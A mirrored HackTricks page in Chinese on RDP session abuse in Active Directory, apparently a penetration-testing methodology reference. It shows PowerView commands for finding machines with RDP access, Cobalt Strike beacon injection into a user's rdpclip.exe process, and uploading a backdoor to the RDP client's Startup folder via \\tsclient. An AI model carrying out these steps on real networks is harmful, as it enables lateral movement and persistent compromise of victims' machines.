Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md

95 lines
5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# RDP 会话滥用
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) 上 **关注**我们**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
</details>
## RDP 进程注入
如果**外部组**在当前域中的任何**计算机**上具有**RDP 访问权限****攻击者**可以**入侵该计算机并等待用户**。
一旦用户通过 RDP 访问,**攻击者可以转向该用户的会话**并滥用其在外部域中的权限。
```powershell
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user
```
查看**本页中使用其他工具窃取会话的其他方法** [**在此页面中。**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
## RDPInception
如果用户通过**RDP访问**一台**等待攻击者**的机器,攻击者将能够**在用户的RDP会话中注入一个信标**,如果**受害者在通过RDP访问时挂载了他的驱动器****攻击者可以访问它**。
在这种情况下,您可以通过在**启动文件夹**中写入**后门**来**妥协受害者的原始计算机**。
```powershell
# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
beacon> inject 4960 x64 tcp-local
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c
Size Type Last Modified Name
---- ---- ------------- ----
dir 02/10/2021 04:11:30 $Recycle.Bin
dir 02/10/2021 03:23:44 Boot
dir 02/20/2021 10:15:23 Config.Msi
dir 10/18/2016 01:59:39 Documents and Settings
[...]
# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
```
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
Reference in a new issue View git blame Copy permalink